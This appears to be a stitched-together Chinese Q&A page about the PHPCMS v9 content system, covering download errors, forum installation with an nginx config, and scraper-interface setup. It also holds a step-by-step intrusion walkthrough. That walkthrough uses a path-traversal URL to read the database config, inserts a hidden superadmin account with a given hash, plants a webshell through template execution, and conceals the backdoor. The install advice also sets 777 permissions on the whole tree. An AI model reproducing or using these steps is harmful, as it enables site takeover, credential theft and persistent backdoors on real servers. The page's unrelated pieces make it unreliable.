本文目录一览:
- 1、phpcms下载文件时,点击下载显示"非法参数"?
- 2、PHPCMS怎么添加论坛功能
- 3、有没有phpcms v9的火车头采集入口
- 4、服务器装什么软件 phpcms注入漏洞
- 5、phpcms v9 怎么让文件可以下载啊 ?
phpcms下载文件时,点击下载显示"非法参数"?
动易的这些细小方面,做得贴心极了,希望PHPCMS不要怕说模仿,好好看看,有好的就学,没什么。我们只想要个好程序。 查看更多答案
PHPCMS怎么添加论坛功能
第一步:到PHPCMS官网下载最新的安装包 。
第二步:将下载好的安装包在本机上解压缩。
注意:只需要上传install_package这个文件夹,可以将这个文件任意重命名,比如定义为:jiaocheng
第三步:将解压缩后的文件件,用FTP工具上传到我方服务器下(/alidata/www)。
第四步:利用XSHELL工具,将以上传的文件夹以及全部子文件夹777(修改属性)。
第五步:通过域名(IP)进入安装界面。
第六步:安装完毕进入后台。后台请参照phpcms手册操作设置。
第七步:按照提示修改部分文件夹属性。
第八步:绑定域名。
代码:
server {
listen 80 ;
server_name jiaocheng.net ;
server_name_in_redirect off;
index index.html index.htm index.php;
root /alidata/www/jiaocheng;
error_page 404 /404.html;
location ~ .*\.(php|php5)?$
{
#fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fastcgi.conf;
}
location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
{
expires 30d;
}
location ~ .*\.(js|css)?$
{
expires 1h;
}
#伪静态规则
include /alidata/server/nginx/conf/rewrite/phpcms.conf;
log_format jiaocheng '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /alidata/log/nginx/access/default.log jiaocheng;
}
注意,请把jiaocheng这个词汇替换成定义的名称,即可。
有没有phpcms v9的火车头采集入口
1、首先下载安装好火车头采集器软件(收费免费的本文均适用),这个我相信大家都会,如有不会的找百度或官方论坛。二、下载phpcmsv9火车头接口文件jiekou.php与发布模块,官方下载地址,本站下载地址(选本站更好些,不用转换发布模块,站在前辈肩膀上就是好,不用写接口文件也不用写模块)。
2、接口文件修改与上传:用软件或文本打开jiekou.php文件,找到$password='123456'; ”这句把123456修改成你想要的数字串,任意数字吧,我现在把它修改为$password='111111'; ,记下这个数字串,后面设置发布模块要用到。修改后保存,用FTP上传到你网站的根目录下,即www文件夹下。
3、设置发布模块:打开火车头软件,找到界面上的:发布:按钮
4、点击进入发布模块界面,我们用6步来完成模块设置,与界面上面的12345步骤顺序有所不同。1.点击新建,找到配置名处:起个配置名,在这里我把这个配置名命名为lunwen。2.选择编码设置,与自己网站的一样吧,在这里我选择GB2312.3.登录操作:首先填入网站根目录地址,如*********,记得这个一定要填根目录;然后点击“在内置浏览器中登录”按钮,用内置浏览器把网站打开,输全后台登录网址,和平时进后台方法一样,登录后台。登录成功后点下下面的“确定”按钮,点击回到模块设置界面:
5、这步很重要,“选择web在线发布模块”,里面没有模块,我们就点最右边的绿字“更多”,然后选择“导入”选中我们在第二步中下载好的phpcmsv9发布模块phpcms9.wpm(官方下载的叫phpcms9.cwr,需要转为wpm格式,欢迎页界面的扩展上可以转)。导入后,点绿色字“编辑”,进入编辑界面,点击获取栏目列表,看到界面中“刷新列表页面”中的地址:/jiekou.php?pw=123456,后面的123456数字串要改为与jiekou.php里的一样,即/jiekou.php?pw=111111,前面jiekou.php里我们是设置为了111111,所以这里改为与之一样。
phpcms v9火车头采集器接口设置图文教程
6、设置完后再点击“内容发布参数”按钮,设置方法和上面图中的一样,见下图吧
phpcms v9火车头采集器接口设置图文教程
7、上面设置好了,这步就点“获取列表”,如果上面设置都正确,就会自动获取到网站的所有栏目,如果不能获取就说明上面设置不对,重新检查一次看看。6.成功获取列表后就算成功了,点击“保存设置”,模块设置成功。6步走总图见下图
phpcms v9火车头采集器接口设置图文教程
8、下一步就等着写采集规则了,做过采集的写火车头采集器采集规则应该不难,都差不多,只要在有多页时注意一下就行了,不懂可以查下百度或论坛,例子很多也很全。
服务器装什么软件 phpcms注入漏洞
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
phpcms v9 怎么让文件可以下载啊 ?
管理栏目,增加一个下载频道的栏目。
然后管理内容,在下载频道的栏目中添加供访问者下载的内容。
